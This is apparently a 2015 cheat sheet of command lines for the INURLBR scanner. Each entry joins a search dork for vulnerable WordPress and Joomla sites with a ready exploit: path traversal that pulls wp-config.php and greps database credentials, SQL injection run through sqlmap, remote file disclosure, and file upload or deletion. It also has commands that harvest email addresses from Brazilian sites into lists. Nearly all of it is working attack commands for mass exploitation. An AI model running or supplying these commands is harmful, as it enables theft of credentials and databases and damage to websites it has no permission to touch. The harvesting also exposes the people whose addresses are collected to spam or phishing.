Googleinurl

EXAMPLES CONTROLS INURLBR

Jan 1st, 2015
[!] CONTROL SERIES
# AUTHOR: Cleiton Pinheiro / NICK: GoogleINURL
# Blog: http://blog.inurl.com.br
# Twitter: https://twitter.com/googleinurl
# Fanpage: https://fb.com/InurlBrasil
# GIT: https://github.com/googleinurl
# YOUTUBE: https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA
# PACKETSTORMSECURITY: http://packetstormsecurity.com/user/googleinurl/

[!]::COMMANDS USED IN THE SCANNER INURLBR | https://github.com/googleinurl/SCANNER-INURLBR
----------------------------------------------------------------------------------------------------

[+] Arbitrary File Download
./inurlbr.php --dork '"canetas" "/revslider/"' -q 1,6 -s wordpress2.txt --exploit-get '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' -t 3 --exploit-comand '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' --comand-vul 'echo "_TARGET__EXPLOIT_">> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_" >> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_"' }


./inurlbr.php --dork '"inurl:/themes/urban/" "www"' -q 1,6 -s wordpress2.txt --exploit-get '/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php' -t 3 --exploit-comand '/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php' --comand-all 'echo "_TARGET__EXPLOIT_">> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_" >> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_"' }

EXPLOIT:
http://pastebin.com/ZEnbxXXd
OR
http://packetstormsecurity.com/files/129607/WordPress-A.F.D.-Theme-Echelon-Arbitrary-File-Download.html
----------------------------------------------------------------------------------------------------

[+] FILTER AND MAIL
./inurlbr.php --dork 'site:.br @ gmail|hotmail|terra|uol ext:txt' -q all -s MEGA.txt -m

cat Lista.txt | egrep '@bol.com.br|@terra.com.br' |cut -d \; -f 1 | sort -u >> bolterra.txt

cat Lista.txt | egrep '@zipmail.com.br' |cut -d \; -f 1 | sort -u >> ZIPMAIL.txt

./inurlbr.php --dork='site:.br intext:gmail || intext:hotmail ext:txt -hdutl -upnet -static' --arquivo='TOPGMAIL.txt'
----------------------------------------------------------------------------------------------------

[+] EXPLOIT COMPONENT JOOMLA
./inurlbr.php --dork '"com_spidercalendar" +"noticias"' -s spider.txt -q 1,6 -t 3 --exploit-get "/index.php?option=com_spidercalendar&calendar_id=1'027" --comand-vul "python spyder.py -H http://_TARGET_/"

EXPLOIT:
http://www.exploit-db.com/exploits/20983/
----------------------------------------------------------------------------------------------------

[+] EGYWEB (Mantrac) <= Remote File Disclosure Exploit
./inurlbr.php --dork '"Created by EGYWEB"' -s rcdz.txt -q 1,6 -t 3 --exploit-get "/360download.php?file_name=classes/db_connector.php" --comand-vul "python rcd.py http://_TARGET_/"

EXPLOIT:
http://1337day.com/exploit/22643
----------------------------------------------------------------------------------------------------

[+] Joomla Spider Form Maker <= 3.4 - SQLInjection
./inurlbr.php --dork '"com_formmaker" +"contato"' -q 1,6 -s com_formmaker.txt -t 3 --exploit-get '/index.php?option=com_formmaker&view=formmaker&id=-1+AND+(SELECT+User+from+mysql.user+limit+0,1)' -a 'mysql.user' --comand-vul "python sqlmap.py -u '_TARGET_/index.php?option=com_formmaker&view=formmaker&id=1' -p id --batch --random-agent --dbs"

EXPLOIT:
http://www.exploit-db.com/exploits/34637/
----------------------------------------------------------------------------------------------------

[+] Wordpress Theme Strange File Upload / File Deletion
./inurlbr.php --dork '"movie" "/wp-content/themes/ut-strange/"' -s del.txt -q 1,6 -t 3 --exploit-get "/wp-content/themes/ut-strange/addpress/includes/ap_fileupload.php" --comand-all "php delete.php http://_TARGET_/ wp.php"

EXPLOIT:
http://de.1337day.com/exploit/22674
----------------------------------------------------------------------------------------------------